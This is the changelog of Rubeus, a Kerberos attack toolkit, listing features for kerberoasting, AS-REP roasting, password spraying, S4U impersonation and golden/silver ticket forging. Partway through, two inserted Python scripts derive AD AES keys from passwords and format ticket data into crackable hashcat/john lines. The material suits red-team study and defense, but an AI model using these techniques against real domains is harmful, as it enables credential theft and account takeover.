All notable changes to this project will be documented in this file.
The format is based on Keep a Changelog, and this project adheres to Semantic Versioning.
- `/nofullpacsig` switch to the `silver` command to exclude the new FullPacChecksum from service tickets (@0xe7)
- `/extendedupndns` switch to both `golden` and `silver` to include the extended version of the UpnDns info buffer (@0xe7)
- Automatically set the proper UPN-exists flag (1 or 0) within the UpnDns info buffer based on LDAP results (@0xe7)
- Default UpnDns flag changed from 0 (UPN_SET) to 1 (NO_UPN_SET) in `golden` and `silver` (@0xe7)
- Typos in `kerberoast` usage, changed from `/preauth` to `/nopreauth` (@0xe7)
- Parsing of logoncount and badpwdcount from LDAP now has exception handling; both are set to 0 if an exception occurs (@0xe7)
- `preauthscan` command to scan for accounts that do not require Kerberos pre-authentication
- `/preauth` argument to the `kerberoast` command, to kerberoast with an account that does not require Kerberos pre-authentication
- `/nopreauth` flag to the `asktgt` command, to request a TGT without providing pre-authentication
- `/service` argument to the `asktgt` command, to request service tickets using an AS-REQ
- `logonsession` command to list information about the current logon session
- A `/debug` flag that outputs base64 encodings of the inputs to and outputs from the ASN.1 decoding/encoding functions
- `/createnetonly` parameter to S4U (@tyranid)
- `/ticket` option to `createnetonly` to import a ticket into the new process without requiring privileges (@tyranid)
- Handling for KERB_ERRORs
- Support for making requests through a KDC proxy using the `/proxyurl:` argument for `asktgt`, `asktgs` and `s4u` (@0xe7)
- `KDC_ERR_SVC_UNAVAILABLE` KERBEROS_ERROR; added `KDC_ERR_MUST_USE_USER2USER` and `KDC_ERR_PATH_NOT_ACCEPTED` (@0xe7)
- Full PAC encoding/decoding (@CCob & @0xe7)
- `golden` and `silver` commands for ticket forging, with a `/ldap` switch to automate retrieving PAC information (@CCob & @0xe7)
- `Networking.GetLdapConnection` with LDAPS support using `LdapConnection` (for `kerberoast`/`asreproast`/`golden`/`silver`) (@0xe7)
- `/getcredentials` for `asktgt` (sends a U2U request and automatically extracts the NT hash) (@0xe7)
- `/u2u` for `asktgs` to send User-to-User requests (@0xe7)
- `/targetuser` for `asktgs` for sending S4U2self requests (@0xe7)
- `/targetdomain` for `asktgs` for forcing a specific domain for the request (@0xe7)
- `/targetuser` for `changepw` for changing the password of other users (upgraded `EncKrbPrivPart` to version -128) (@CCob)
- `/servicekey`, `/krbkey` and `/asrepkey` to `describe` for showing the PAC and verifying checksums (@CCob & @0xe7)
- `/serviceuser` and `/servicedomain` to `describe` to create crackable "hashes" from AES encrypted tickets (@0xe7)
- `/autoenterprise` now works with the kerberoasting `KerberosRequestorSecurityToken.GetRequest` method (@0xe7)
- `/ldaps` to `kerberoast` and `asreproast` for querying LDAPS (@0xe7)
- `/servicekey` to `asktgt` and `asktgs` to decrypt the EncTicketPart (@CCob & @0xe7)
- `/krbkey` and `/krbenctype` to `asktgs` for verifying the KDCChecksum and TicketChecksum (@0xe7)
- `/printargs` switch to `asktgs` for printing the arguments required for building a similar PAC with `golden` or `silver` (@0xe7)
- `Networking.GetGptTmplContent` for parsing domain policy files, used when forging tickets (and `/ldap` is used) (@0xe7)
- `Helpers.GetADObjects` for converting returned LDAP results into a common format (`List<IDictionary<string, Object>>`) (@0xe7)
- Complete rewrite of `Networking.SendBytes` (@CCob)
- Fixed `PA_S4U_X509_USER` pa-data section for `s4u /opsec` (@0xe7)
- Added a check after S4U2self to throw an error if no ticket is received, which avoids an unhandled exception when calling S4U2proxy without a ticket in the `s4u` command (@0xe7)
- Handled `KDC_ERR_KEY_EXPIRED` for the `brute` command (@0xe7)
- Complete rewrite of the `AuthorizationData` sections (@0xe7)
- Added `keyUsage` argument to `Crypto.KerberosChecksum` to create the `PA_S4U_X509_USER` checksum (@0xe7)
- Aliased `brute` to `spray` (@0xe7)
- Changed `System.Net.NetworkInformation.IPGlobalProperties.GetIPGlobalProperties().DomainName` to `System.DirectoryServices.ActiveDirectory.Domain.GetCurrentDomain().Name` for `asktgt` when automatically resolving the domain (works in more situations) (@0xe7)
- Only the final cert in the chain is used for verification when signing PKINIT requests; `/verifycerts` flag added for full chain verification
- Replaced `/certificate` info in help and README
- Adapted/integrated the PR from @RiccardoAncarani for the `/delay:MILLISECONDS` and `/jitter:%` (1-100) flags for `kerberoast`
- Rubeus.yar yara rule from FireEye's red team tool countermeasure repo
- Arguments can now use the `/arg=value` form in addition to `/arg:value`
- A few kerberoasting fixes
- `/autoenterprise` flag to automate retrying failed kerberoasting attempts (@0xe7)
- Support for CVE-2020-17049 using the `/bronzebit` switch (@0xe7)
- Initial support for basic silver tickets, without a PAC (@0xe7)
- Cross-domain enterprise principal kerberoasting (@0xe7)
- Kerberoasting using a DC IP and supplying a TGT (@0xe7)
- OPSEC
  - `/opsec` switch to make `asktgt`/`asktgs`/`s4u` build more realistic requests (@0xe7)
  - Randomized sequence numbers (@0xe7)
  - Added proper checksums (@0xe7)
  - Added enc-authorization-data to TGS-REQs (@0xe7)
  - Don't send AS-REQ when preauth is disabled (@0xe7)
  - Automation of requesting a forwarded TGT when requesting a service ticket for unconstrained systems (@0xe7)
  - Added PA-DATA PA-PAC-OPTIONS to the normal TGS-REQ when using `/opsec` (@0xe7)
- Start of smartcard/PKINIT support (@CCob)
  - `/password` support
- Support for the `/spns` option when kerberoasting (@0xe7)
- Support for NT-Enterprise principals for service ticket requests on both the `asktgs` and `kerberoast` commands (@0xe7)
- Support for modifying S4U2Self tickets to be able to impersonate any user on the requesting machine (@0xe7)
- Cross-domain `s4u`/`asktgs` support (@0xe7)
- `/runfor:X` flag for the `monitor` command (@G0ldenGunSec)
- IPv6 support (@royreinders)
- `kerberoast /user:X` now takes multiple comma-separated values
- Casing fix for AES key salts
- Kerberoasting when using a TGT to authenticate but not supplying SPNs (@0xe7)
- GetDCName() issue on non-domain-joined systems
- Nonce randomized
- Fixes for issues from non-domain machines (@VbScrub)
- Replaced checks for the "NT Authority\System" string with a SID comparison
- /rc4opsec service name fix
- LDAP paged searching (@cnotin)
- TGS-REQ AES formatting (@Ion Todd)
- to any command that outputs base64 ticket blobs
  - the universal `/nowrap` argument prevents base64 ticket blobs from being display-wrapped
- the universal `/consoleoutfile` argument to redirect console output to a file, and the public `MainString("command")` function to work over PSRemoting (see end of README.md)
- brute action (from @Zer1t0)
  - Performs password bruteforcing attacks using raw AS-REQs
- to triage/klist/dump actions
  - More flexible targeting with `/user`, `/luid`, `/service` and `/server`
- to the kerberoast action
  - `/pwdsetafter`, `/pwdsetbefore`, and `/resultlimit` arguments for better targeting (from @pkb1s)
  - `/stats` flag to list statistics of user accounts without actually roasting them
  - `/ldapfilter` argument for adding custom LDAP filters to the user search query
  - `/simple` argument for output in the output-file format, but to the console
- to the asreproast action
  - `/ldapfilter` argument for adding custom LDAP filters to the user search query
- to the asktgt/asktgs/s4u actions
  - option to save the .kirbi file to disk (from @audrummer15)
- to the s4u action
  - the cross-domain s4u support (from @0xe7)
- currentluid command to display the current logon session ID
- LSA.cs got a complete overhaul for reusability and flexibility (thanks for the help @leechristensen !)
- kerberoast action updated to exclude disabled accounts by default
- harvest mode's /interval argument is now in seconds, to match /monitor
- harvest / monitor modes revamped
  - no longer depend on searching the event logs for 4624 events
  - the full set of current TGTs is extracted each monitor round
- Some timestamp converting code in the ticket extraction section
- KERB_RETRIEVE_TKT_REQUEST fix for x32 systems (from @0xRCA)
- Fixed AES salt generation (from @monoxgas)
- Fixed accidental ticket request behavior when dumping from LsaCallAuthenticationPackage
- Fixed `renew` command invocation
- Fixed `asreproast` LDAP querying (broke at some point)
- tgssub action
  - Substitutes an alternate sname (cifs) or SPN (ldap/computer.domain.com) into an existing service ticket
- asktgs action
  - /enctype:[RC4/AES128/AES256/DES] now forces that particular encryption type in the TGS-REQ
- asktgt action
  - Returned tickets are now run through the describe command
- describe action
  - Kerberoast hash now only extracted from RC4_HMAC tickets
- hash action
  - hashes a given password to rc4_hmac form, and if /user and /domain are supplied, calculates the aes128_cts_hmac_sha1, aes256_cts_hmac_sha1, and des_cbc_md5 forms
- kerberoast action
  - Fixed the query that checks whether rc4_hmac is flipped in msDS-SupportedEncryptionTypes, because "lol Microsoft"
- asktgt action
  - /aes128 and /aes now supported for /enctype when used with /password
- crypto
  - Replaced @qlemaire's PR of Kevin-Robertson's Get-KerberosAESKey hash code with @gentilkiwi's KERB_ECRYPT HashPassword approach
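The hash action, the /aes and /aes128 enctypes with /password, and the AES salt fixes above all rest on the same computation: Kerberos string-to-key for the AES etypes (RFC 3962) with the salt Active Directory derives from the realm and account name. The script below is an added example for this changelog, not Rubeus code, and walks that computation end to end: salt construction, PBKDF2-HMAC-SHA1 (4096 rounds by default), then the DK step that turns the PBKDF2 output into the aes128_cts_hmac_sha1 or aes256_cts_hmac_sha1 key. A minimal AES block cipher is included only so the script runs without third-party packages (an assumption about the host); the function and variable names are the example's own. The salt rule, realm upper-cased with user name case preserved, and REALM + "host" + lower-case hostname + "." + lower-case realm for computer accounts, is the MS-KILE convention; get the realm case wrong and you derive a key the KDC never issued, which is the failure the "casing fix for AES key salts" entry describes.

```python
"""Kerberos AES string-to-key (RFC 3962) with the Active Directory salt.

Added example for this changelog; it is not Rubeus code. The small AES block
cipher exists only so the script runs without third-party packages.
"""
import hashlib

# AES S-box, 16 bytes per row (FIPS-197 figure 7).
SBOX = bytes.fromhex(
    "637c777bf26b6fc53001672bfed7ab76" "ca82c97dfa5947f0add4a2af9ca472c0"
    "b7fd9326363ff7cc34a5e5f171d83115" "04c723c31896059a071280e2eb27b275"
    "09832c1a1b6e5aa0523bd6b329e32f84" "53d100ed20fcb15b6acbbe394a4c58cf"
    "d0efaafb434d338545f9027f503c9fa8" "51a3408f929d38f5bcb6da2110fff3d2"
    "cd0c13ec5f974417c4a77e3d645d1973" "60814fdc222a908846eeb814de5e0bdb"
    "e0323a0a4906245cc2d3ac629195e479" "e7c8376d8dd54ea96c56f4ea657aae08"
    "ba78252e1ca6b4c6e8dd741f4bbd8b8a" "703eb5664803f60e613557b986c11d9e"
    "e1f8981169d98e949b1e87e9ce5528df" "8ca1890dbfe6426841992d0fb054bb16"
)
# n-fold("kerberos", 128 bits): the DK constant from RFC 3961 A.1 / RFC 3962.
KERBEROS_NFOLD = bytes.fromhex("6b65726265726f737b9b5b2b93132b93")


def _xtime(b):
    """Multiply by x in GF(2^8) modulo the AES polynomial x^8+x^4+x^3+x+1."""
    b <<= 1
    return b ^ 0x11B if b & 0x100 else b


def _expand_key(key):
    """FIPS-197 key schedule: Nr+1 round keys, each four 4-byte words."""
    nk = len(key) // 4
    words = [list(key[i:i + 4]) for i in range(0, len(key), 4)]
    rcon = 1
    for i in range(nk, 4 * (nk + 7)):
        t = words[i - 1][:]
        if i % nk == 0:
            t = [SBOX[x] for x in t[1:] + t[:1]]  # RotWord + SubWord
            t[0] ^= rcon
            rcon = _xtime(rcon)
        elif nk > 6 and i % nk == 4:  # extra SubWord for AES-256
            t = [SBOX[x] for x in t]
        words.append([a ^ b for a, b in zip(words[i - nk], t)])
    return [words[4 * r:4 * r + 4] for r in range(nk + 7)]


def aes_encrypt_block(key, block):
    """Encrypt one 16-byte block; the state is kept column-major (s[r + 4c])."""
    rks = _expand_key(key)
    last = len(rks) - 1
    s = [b ^ rks[0][i // 4][i % 4] for i, b in enumerate(block)]
    for rnd in range(1, last + 1):
        s = [SBOX[x] for x in s]                                        # SubBytes
        s = [s[i % 4 + 4 * ((i // 4 + i % 4) % 4)] for i in range(16)]  # ShiftRows
        if rnd != last:                                                 # MixColumns
            mixed = []
            for c in range(4):
                a = s[4 * c:4 * c + 4]
                t = a[0] ^ a[1] ^ a[2] ^ a[3]
                mixed += [a[i] ^ t ^ _xtime(a[i] ^ a[(i + 1) % 4]) for i in range(4)]
            s = mixed
        s = [x ^ rks[rnd][i // 4][i % 4] for i, x in enumerate(s)]    # AddRoundKey
    return bytes(s)


def ad_salt(domain, account):
    """Salt AD uses for AES keys (MS-KILE 3.1.1.2): realm upper-cased, user
    name case preserved; for a computer account (trailing '$') it is
    REALM + 'host' + lower-case hostname + '.' + lower-case realm."""
    realm = domain.upper()
    if account.endswith("$"):
        return realm + "host" + account[:-1].lower() + "." + domain.lower()
    return realm + account


def kerberos_aes_key(password, salt, key_bytes, iterations=4096):
    """RFC 3962 string-to-key: tkey = PBKDF2-HMAC-SHA1, key = DK(tkey, 'kerberos').
    key_bytes is 16 for aes128_cts_hmac_sha1 and 32 for aes256_cts_hmac_sha1."""
    tkey = hashlib.pbkdf2_hmac("sha1", password.encode("utf-8"),
                               salt.encode("utf-8"), iterations, key_bytes)
    # DR: K1 = E(tkey, nfold), K2 = E(tkey, K1), ...; a single 16-byte block
    # under CBC/CTS with a zero IV is plain ECB, so the block cipher suffices.
    out, prev = b"", KERBEROS_NFOLD
    while len(out) < key_bytes:
        prev = aes_encrypt_block(tkey, prev)
        out += prev
    return out[:key_bytes]


if __name__ == "__main__":
    # Constructed inputs, not real credentials.
    salt = ad_salt("testlab.local", "harmj0y")
    print("salt      :", salt)
    print("aes128 key:", kerberos_aes_key("Password123!", salt, 16).hex())
    print("aes256 key:", kerberos_aes_key("Password123!", salt, 32).hex())
```

The RFC 3962 appendix B vectors (password "password", salt "ATHENA.MIT.EDUraeburn", one iteration) are the quickest way to check an implementation like this: they exercise both the PBKDF2 step and the DK step, and any AES-256 key-schedule mistake shows up as a wrong second half of the 32-byte key.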
- README
- added @elad_shamir into the references
- kerberoast action
- /rc4opsec option to use tgtdeleg and filter out AES-enabled accounts
- /aes option to AES roast only AES-enabled accounts
- kerberoast action
- Default user query searches for accounts with RC4 enabled
- Default behavior when using the /tgtdeleg flag requests RC4 for ALL accounts (including AES)
- Display "Supported ETypes" in enumerated output
- tgtdeleg action
- Changed the default requested SPN from HOST/dc.domain.com to cifs/dc.domain.com
- Kerberoast hash display for some option combinations
- kerberoast action
- now has /ticket option to use an existing TGT for Kerberoasting
- now has /usetgtdeleg option to use tgtdeleg option as the TGT for Kerberoasting
- LDAP user search path and number of found users now output
- describe action
- Kerberoast hash output now generated for service tickets
- Kerberoast hash display bug when /spn and /outfile were specified
- Kerberoast samaccountname now properly put into hash output
- kerberoast action now has /domain and /dc like asreproast action
- kerberoast and asreproast now properly work over domain trusts
- triage command now works for the current non-elevated user, outputting current LUID as well
- Current LUID output also added for non-elevated dump and klist commands
- Added Opsec section in README.md
- Landed @leechristensen's cleanup of the Monitor4624 code
- Restructured the README.md to match the help output, updated all examples, added table of contents
- triage action
- Quickly triages the users and present tickets on a machine
- dump and klist changed default LUID output to hex format
- kerberoast and asreproast actions
- Added /outfile:X to output hashes to a file, one hash per line
- asreproast action
  - changed default behavior to match kerberoast
- Clustered the default output help menu around function (things were getting crowded)
- Changed underlying LUID logic to handle UInt64s
- klist action
- lists current user's (or if elevated, all users') ticket information
- s4u action
  - landed @eladshamir's pull requests
    - RBCD support
    - support loading a TGS from a .kirbi to skip S4U2Self and perform S4U2Proxy only
    - perform S4U2Self only
    - print output for each stage
- asreproast action
  - landed @rvrsh3ll's pull request
    - added hashcat output format
- asktgt action
  - landed @qlemaire's pull request
    - now accepts a /password:X parameter
- monitor and harvest actions
  - landed @djhohnstein's pull request
    - ticket extraction can now be saved to the registry with the "/registry:X" flag
- dump display of service tickets with multiple slashes
- response buffer size in lib/Networking.cs increased for large ticket responses
- landed @BlueSkeye's fixes for PTT bug fix, TicketFlags display, and dead code removal in PA_DATA.Encode
- Merged @mark-s' PR that broke out Program.cs' commands into 'Command' classes for easier command addition.
- Commands that pass /dc:X are now passed through Networking.GetDCIP(), which resolves the DC name (if null) and returns the DC IP. Code refactored to use this centralized resolver.
- The /user:USER flag can now be /user:DOMAIN.COM\USER (auto-completes /domain:Y).
- The harvest command now returns the user ticket with the latest renew_till time on initial extraction.
- changepw action
  - implements the AoratoPw user password reset from a TGT .kirbi
  - equivalent to Kekeo's misc::changepw function
- asktgs action
  - takes /ptt:X, /dc:X, /ticket:X flags like asktgt; /service:X takes one or more SPN specifications
- tgtdeleg action
  - reimplements @gentilkiwi's Kekeo tgt::deleg function
  - uses the GSS-API Kerberos specification (RFC 4121) to request a "fake" delegation context that stores a KRB-CRED in the Authenticator Checksum. Combined with extracting the service session key from the local cache, this allows us to recover usable TGTs for the current user without elevation.
- Added CHANGELOG.md
- s4u action now accepts multiple alternate snames (/altservice:X,Y,...)
- This executes the S4U2self/S4U2proxy process only once, and substitutes the multiple alternate service names into the final resulting service ticket structure(s) for as many snames as specified
- asreproast action
- added eventual hashcat output format, use "/format:<john/hashcat>" (default of "john")
- dump action now correctly extracts ServiceName/TargetName strings
- asreproast action - fixed salt demarcation line for "asreproast" hashes
- kerberoast action
- Added reference to @machsosec for the KerberosRequestorSecurityToken.GetRequest() Kerberoasting method
- Corrected encType extraction for the hash output
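Several entries above concern the same detail: turning a ticket's EncryptedData into a crackable line (the encType extraction fix here, the hashcat/john formats for asreproast, the salt demarcation fix, and later "Kerberoast hash now only extracted from RC4_HMAC tickets" and the /serviceuser and /servicedomain options for AES tickets). The script below is an added example for this changelog, not Rubeus code. It parses the DER of a Kerberos EncryptedData (etype, optional kvno, cipher) and emits the `$krb5tgs$` / `$krb5asrep$` layouts documented for hashcat modes 13100 (RC4), 19600/19700 (AES) and 18200 (AS-REP), which John also reads; the AES layout carries the SPN inside `*...*` as a describe-style command prints it, a segment hashcat treats as optional. The reason the etype check matters: RC4-HMAC puts its 16-byte HMAC-MD5 checksum before the encrypted data, AES-CTS puts a 12-byte truncated HMAC-SHA1 after it, so a line built with the wrong split never cracks. All sample bytes and names are constructed; the DER encoder exists only to build the sample.

```python
"""Crackable hash lines from a Kerberos ticket's EncryptedData.

Added example for this changelog, not Rubeus code. Sample data is constructed.
"""
RC4_HMAC, AES128_CTS, AES256_CTS = 23, 17, 18


def _der_read(buf, pos):
    """Read one DER TLV at pos; returns (tag, value, next_pos)."""
    tag, length = buf[pos], buf[pos + 1]
    pos += 2
    if length & 0x80:                       # long-form length
        n = length & 0x7F
        length = int.from_bytes(buf[pos:pos + n], "big")
        pos += n
    return tag, buf[pos:pos + length], pos + length


def parse_encrypted_data(der):
    """EncryptedData ::= SEQUENCE { etype [0] Int32, kvno [1] UInt32 OPTIONAL,
    cipher [2] OCTET STRING }; returns (etype, cipher)."""
    tag, body, _ = _der_read(der, 0)
    if tag != 0x30:
        raise ValueError("EncryptedData must be a SEQUENCE")
    fields, pos = {}, 0
    while pos < len(body):
        ctx_tag, wrapped, pos = _der_read(body, pos)
        _, inner, _ = _der_read(wrapped, 0)   # strip the [n] context wrapper
        fields[ctx_tag & 0x1F] = inner
    etype = int.from_bytes(fields[0], "big", signed=True)
    return etype, fields[2]


def kerberoast_hash(etype, cipher, user, domain, spn):
    """TGS-REP ticket enc-part -> $krb5tgs$ line, split according to the etype."""
    c = cipher.hex()
    if etype == RC4_HMAC:
        # 16-byte HMAC-MD5 checksum first, then the encrypted data.
        return f"$krb5tgs$23$*{user}${domain}${spn}*${c[:32]}${c[32:]}"
    if etype in (AES128_CTS, AES256_CTS):
        # Encrypted data first, 12-byte truncated HMAC-SHA1 last.
        return f"$krb5tgs${etype}${user}${domain}$*{spn}*${c[-24:]}${c[:-24]}"
    raise ValueError(f"no crackable format for etype {etype}")


def asreproast_hash(cipher, user, domain, fmt="john"):
    """AS-REP enc-part (RC4) -> $krb5asrep$ line; ':' separates the salt part
    (user@domain) from the checksum, '$' the checksum from the data."""
    c = cipher.hex()
    prefix = "$krb5asrep$23$" if fmt == "hashcat" else "$krb5asrep$"
    return f"{prefix}{user}@{domain}:{c[:32]}${c[32:]}"


def _der(tag, content):
    """Minimal DER encoder, used only to build the constructed sample."""
    n = len(content)
    if n < 0x80:
        return bytes([tag, n]) + content
    size = (n.bit_length() + 7) // 8
    return bytes([tag, 0x80 | size]) + n.to_bytes(size, "big") + content


def sample_encrypted_data(etype, cipher):
    """Constructed EncryptedData DER with [0] etype and [2] cipher (no kvno)."""
    return _der(0x30, _der(0xA0, _der(0x02, bytes([etype])))
                + _der(0xA2, _der(0x04, cipher)))


def hash_from_ticket(der, user, domain, spn):
    """What a describe-style command does: parse, then pick the split by etype."""
    etype, cipher = parse_encrypted_data(der)
    return kerberoast_hash(etype, cipher, user, domain, spn)


if __name__ == "__main__":
    fake_cipher = bytes(range(200))   # constructed, not a real ticket
    for et in (RC4_HMAC, AES256_CTS):
        der = sample_encrypted_data(et, fake_cipher)
        print(hash_from_ticket(der, "svc_sql", "CORP.LOCAL",
                               "MSSQLSvc/sql01.corp.local:1433"))
    print(asreproast_hash(fake_cipher, "nopreauth", "corp.local", "hashcat"))
```

Feeding the same bytes through both branches makes the difference visible: the RC4 line's checksum field is the first 32 hex characters of the cipher, the AES line's is the last 24, and an unsupported etype raises instead of producing a line that looks valid but can never be cracked.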
- Initial release